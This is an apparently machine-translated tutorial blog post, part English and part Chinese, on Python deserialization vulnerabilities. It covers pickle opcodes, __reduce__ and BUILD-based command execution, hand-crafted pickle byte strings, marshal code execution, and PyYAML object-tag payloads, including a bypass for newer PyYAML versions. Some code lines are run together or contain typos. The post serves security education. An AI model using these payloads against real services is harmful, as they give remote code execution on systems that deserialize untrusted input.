Take you to understand Python deserialization

Release: 2022-03-28 14:19:26
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This article brings you relevant knowledge about python, which mainly introduces related issues about deserialization. Deserialization: pickle.loads() deserializes strings For objects, pickle.load() reads data from files and deserializes it. I hope it will be helpful to everyone.

Take you to understand Python deserialization

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Python deserialization vulnerability


  • Serialization: pickle.dumps() Serialize the object into a string, pickle.dump() Store the object serialized string as a file
  • Deserialization: pickle.loads() Deserialize string into object, pickle.load() Deserialize read data from file

When using dumps() and loads(), you can use the protocol parameter to specify the protocol version

protocol There are versions 0, 1, 2, 3, 4, and 5. Different python versions have different default protocol versions. Among these versions, No. 0 is the most readable. Later versions added unprintable characters for optimization. The protocol

is backward compatible. Version No. 0 can also be used directly.

Serializable Objects

  • None, True and False
  • Integer, floating point number, complex number
  • str, byte, bytearray
  • Only contains a collection of objects that can be sealed, including tuple, list, set and dict
  • Defined at the outermost part of the module Layer functions (defined using def, lambda functions are not allowed)
  • Built-in functions defined in the outermost layer of the module
  • Defined in the outermost class of the module
  • __dict__ The attribute value or the return value of the __getstate__() function can be serialized (see Pickling Class Instances in the official documentation for details)

Deserialization process

The underlying implementation of pickle.load() and pickle.loads() methods is based on the _Unpickler() method to deserialize

In the deserialization process , _Unpickler (hereinafter referred to as the machine) maintains two things: the stack area and the storage area

In order to study it, you need to use a debuggerpickletools

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As can be seen from the picture, the serialized string is actually a string of PVM (Pickle Virtual Machine) instruction codes. The instruction codes are based on the stack Formal storage and parsing

PVM instruction set

The complete PVM instruction set can be viewed inpickletools.py. The instruction sets used by different protocol versions Slightly different

The instruction code in the above picture can be translated into:

    0: \x80 PROTO      3  # 协议版本
    2: ]    EMPTY_LIST  # 将空列表推入栈
    3: (    MARK  # 将标志推入栈
    4: X        BINUNICODE 'a'  # unicode字符
   10: X        BINUNICODE 'b'
   16: X        BINUNICODE 'c'
   22: e        APPENDS    (MARK at 3)  # 将3号标准之后的数据推入列表
   23: .    STOP  # 弹出栈中数据,结束
highest protocol among opcodes = 2
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There are several important instruction codes in the instruction set:

  • GLOBAL = b'c ' # Push two strings ending with a newline onto the stack, the first is the module name, the second is the class name, that is, the value of the global variable xxx.xxx can be called
  • REDUCE = b'R' # Push the object generated by the callable tuple and the parameter tuple onto the stack, that is, the first value returned by __reduce() is used as the executable function, and the second value is Parameters, execution function
  • BUILD = b'b' # Complete the construction of the object through __setstate__ or update __dict__, if the object has the __setstate__ method, Then call anyobject .__setstate__(parameter); if there is no __setstate__ method, update the value through anyobject.__dict__.update(argument)(update possible Will produce variable coverage)
  • STOP = b'.' # End

A more complex example:

import pickleimport pickletoolsclass a_class():
    def __init__(self):
        self.age = 24
        self.status = 'student'
        self.list = ['a', 'b', 'c']a_class_new = a_class()a_class_pickle = pickle.dumps(a_class_new,protocol=3)print(a_class_pickle)# 优化一个已经被打包的字符串a_list_pickle = pickletools.optimize(a_class_pickle)print(a_class_pickle)# 反汇编一个已经被打包的字符串pickletools.dis(a_class_pickle)
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    0: \x80 PROTO      3
    2: c    GLOBAL     '__main__ a_class'
   20: )    EMPTY_TUPLE  # 将空元组推入栈
   21: \x81 NEWOBJ  # 表示前面的栈的内容为一个类(__main__ a_class),之后为一个元组(20行推入的元组),调用cls.__new__(cls, *args)(即用元组中的参数创建一个实例,这里元组实际为空)
   22: }    EMPTY_DICT  # 将空字典推入栈
   23: (    MARK
   24: X        BINUNICODE 'age'
   32: K        BININT1    24
   34: X        BINUNICODE 'status'
   45: X        BINUNICODE 'student'
   57: X        BINUNICODE 'list'
   66: ]        EMPTY_LIST
   67: (        MARK
   68: X            BINUNICODE 'a'
   74: X            BINUNICODE 'b'
   80: X            BINUNICODE 'c'
   86: e            APPENDS    (MARK at 67)
   87: u        SETITEMS   (MARK at 23)  # 将将从23行开始传入的值以键值对添加到现有字典中
   88: b    BUILD  # 更新字典完成构建
   89: .    STOP
highest protocol among opcodes = 2
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Common functions Execution

There are three PVM instruction sets related to function execution: R, i, o, so we can start from the three Construct in one direction:


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__reduce()__ command execution

##__recude()__ The magic function will end at the deserialization process It is automatically called and returns a tuple. Among them, the first element is a callable object, which is called when creating the initial version of the object. The second element is the parameter of the callable object, which may cause an RCE vulnerability during deserialization

The instruction code that triggers

__reduce()_ is ``R, **As long as the R instruction** exists in the string being serialized, # The ##reduce method will be executed regardless of whether the reduce` method is specified in the normal program. pickle will ## during deserialization #Automatically import unintroduced modules

, so all code execution and command execution functions in the python standard library can be used, but the python version that generates

payload should be consistent with the targetexample:

class a_class():
    def __reduce__(self):
        return os.system, ('whoami',)# __reduce__()魔法方法的返回值:# os.system, ('whoami',)# 1.满足返回一个元组,元组中至少有两个参数# 2.第一个参数是被调用函数 : os.system()# 3.第二个参数是一个元组:('whoami',),元组中被调用的参数 'whoami' 为被调用函数的参数# 4. 因此序列化时被解析执行的代码是 os.system('whoami')
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    0: \x80 PROTO      3
    2: c    GLOBAL     'nt system'
   13: X    BINUNICODE 'whoami'
   24: \x85 TUPLE1
   25: R    REDUCE
   26: .    STOP
highest protocol among opcodes = 2
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将该字符串反序列化后将会执行命令 os.system('whoami')


__reduce()_利用的是 R 指令码,造成REC,而利用 GLOBAL = b’c’ 指令码则可以触发全局变量覆盖

# secret.pya = aaaaaa
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# unser.pyimport secretimport pickleclass flag():
    def __init__(self, a):
        self.a = a

your_payload = b'?'other_flag = pickle.loads(your_payload)secret_flag = flag(secret)if other_flag.a == secret_flag.a:
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在不知道 secret.a 的情况下要如何获得 flag 呢?

先尝试获得 flag() 的序列化字符串:

class flag():
    def __init__(self, a):
        self.a = a
new_flag = pickle.dumps(Flag("A"), protocol=3)flag = pickletools.optimize(new_flag)print(flag)print(pickletools.dis(new_flag))
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    0: \x80 PROTO      3
    2: c    GLOBAL     '__main__ Flag'
   17: q    BINPUT     0
   19: )    EMPTY_TUPLE
   20: \x81 NEWOBJ
   21: q    BINPUT     1
   23: }    EMPTY_DICT
   24: q    BINPUT     2
   26: X    BINUNICODE 'a'
   32: q    BINPUT     3
   34: X    BINUNICODE 'A'
   40: q    BINPUT     4
   42: s    SETITEM
   43: b    BUILD
   44: .    STOP
highest protocol among opcodes = 2
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可以看到,在34行进行了传参,将变量 A 传入赋值给了a。若将 A 修改为全局变量 secret.a,即将 X BINUNICODE 'A' 改为 c GLOBAL 'secret a'(X\x01\x00\x00\x00A 改为 csecret\na\n)。将该字符串反序列化后,self.a 的值等于 secret.a 的值,成功获取 flag

除了改写 PVM 指令的方式外,还可以使用 exec 函数造成变量覆盖:

test1 = 'test1'test2 = 'test2'class A:
   def __reduce(self):
       retutn exec, "test1='asd'\ntest2='qwe'"
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假设某个类原先没有__setstate__方法,我们可以利用{'__setstate__': os.system}来BUILE这个对象





class payload:
    def __init__(self):
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根据这个类构造 PVM 指令:

    0: \x80 PROTO      3
    2: c    GLOBAL     '__main__ payload'
   17: q    BINPUT     0
   19: )    EMPTY_TUPLE
   20: \x81 NEWOBJ
   21: }    EMPTY_DICT  # 使用BUILD,先放入一个字典
   22: (    MARK  # 放值前先放一个标志
   23: V        UNICODE    '__setstate__'  # 放键值对
   37: c        GLOBAL     'nt system'
   48: u        SETITEMS   (MARK at 22)
   49: b    BUILD  # 第一次BUILD
   50: V    UNICODE    'whoami'  # 加参数
   58: b    BUILD  # 第二次BUILD
   59: .    STOP
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将上述 PVM 指令改写成 bytes 形式:b'\x80\x03c__main__\npayload\n)\x81}(V__setstate__\ncnt\nsystem\nubVwhoami\nb.',使用 piclke.loads() 反序列化后成功执行命令


pickle 不能将代码对象序列化,但 python 提供了一个可以序列化代码对象的模块 Marshal

但是序列化的代码对象不再能使用 __reduce()_ 调用,因为__reduce__是利用调用某个可调用对象并传递参数来执行的,而我们这个函数本身就是一个可调用对象 ,我们需要执行它,而不是将他作为某个函数的参数。隐藏需要利用 typres 模块来动态的创建匿名函数

import marshalimport typesdef code():
    import os    print('hello')
    os.system('whoami')code_pickle = base64.b64encode(marshal.dumps(code.__code__))  # python2为 code.func_codetypes.FunctionType(marshal.loads(base64.b64decode(code_pickle)), globals(), '')()  # 利用types动态创建匿名函数并执行
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pickle 上使用:

import pickle# 将types.FunctionType(marshal.loads(base64.b64decode(code_pickle)), globals(), '')()改写为 PVM 的形式s = b"""ctypes
tR(tR."""pickle.loads(s)  # 字符串转换为 bytes
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  • 解析认证 token、session 时
  • 将对象 pickle 后存储在磁盘文件
  • 将对象 pickle 后在网络中传输
  • 参数传递给程序


yaml 是一种标记类语言,类似与 xmljson,各个支持yaml格式的语言都会有自己的实现来进行 yaml 格式的解析(读取和保存),PyYAML 就是 yaml 的 python 实现

在使用 PyYAML 库时,若使用了 yaml.load() 而不是 yaml.safe_load() 函数解析 yaml文件,则会导致反序列化漏洞的产生


PyYAML 有针对 python 语言特有的标签解析的处理函数对应列表,其中有三个和对象相关:

!!python/object:          =>  Constructor.construct_python_object!!python/object/apply:    =>  Constructor.construct_python_object_apply!!python/object/new:      =>  Constructor.construct_python_object_new
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# Test.pyimport yamlimport osclass test:
    def __init__(self):
        os.system('whoami')payload = yaml.dump(test())fp = open('sample.yml', 'w')fp.write(payload)fp.close()
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该代码执行后,会生成 sample.yml ,并写入 !!python/object:__main__.test {}

将文件内容改为 !!python/object:Test.test {} 再使用 yaml.load() 解析该 yaml 文件:

import yaml
yaml.load(file('sample.yml', 'w'))
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Take you to understand Python deserialization

命令成功执行。但是命令的执行依赖于 Test.py 的存在,因为 yaml.load() 时会根据yml文件中的指引去读取 Test.py 中的 test 这个对象(类)。如果删除 Test.py ,也将运行失败



想要消除依赖执行命令,就需要将其中的类或者函数换成 python 标准库中的类或函数,并使用另外两种 python 标签:

# 该标签可以在 PyYAML 解析再入 YAML 数据时,动态的创建 Python 对象!!python/object/apply:    =>  Constructor.construct_python_object_apply# 该标签会调用 apply!!python/object/new:      =>  Constructor.construct_python_object_new
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利用这两个标签,就可以构造任意 payload:

!!python/object/apply:subprocess.check_output [[calc.exe]]!!python/object/apply:subprocess.check_output ["calc.exe"]!!python/object/apply:subprocess.check_output [["calc.exe"]]!!python/object/apply:os.system ["calc.exe"]!!python/object/new:subprocess.check_output [["calc.exe"]]!!python/object/new:os.system ["calc.exe"]
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PyYAML >= 5.1

在版本 PyYAML >= 5.1 后,限制了反序列化内置类方法以及导入并使用不存在的反序列化代码,并且在使用 load() 方法时,需要加上 loader 参数,直接使用时会爆出安全警告


  • BaseLoader:仅加载最基本的YAML
  • SafeLoader:安全地加载YAML语言的子集,建议用于加载不受信任的输入(safe_load)
  • FullLoader:加载完整的YAML语言,避免任意代码执行,这是当前(PyYAML 5.1)默认加载器调用yaml.load(input) (出警告后)(full_load)
  • UnsafeLoader(也称为Loader向后兼容性):原始的Loader代码,可以通过不受信任的数据输入轻松利用(unsafe_load)

在高版本中之前的 payload 已经失效,但可以使用 subporcess.getoutput() 方法绕过检测:

- whoami
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Take you to understand Python deserialization





  • load(data)
  • load(data, Loader=Loader)
  • load(data, Loader=UnsafeLoader)
  • load(data, Loader=FullLoader)
  • load_all(data)
  • load_all(data, Loader=Loader)
  • load_all(data, Loader=UnSafeLoader)
  • load_all(data, Loader=FullLoader)



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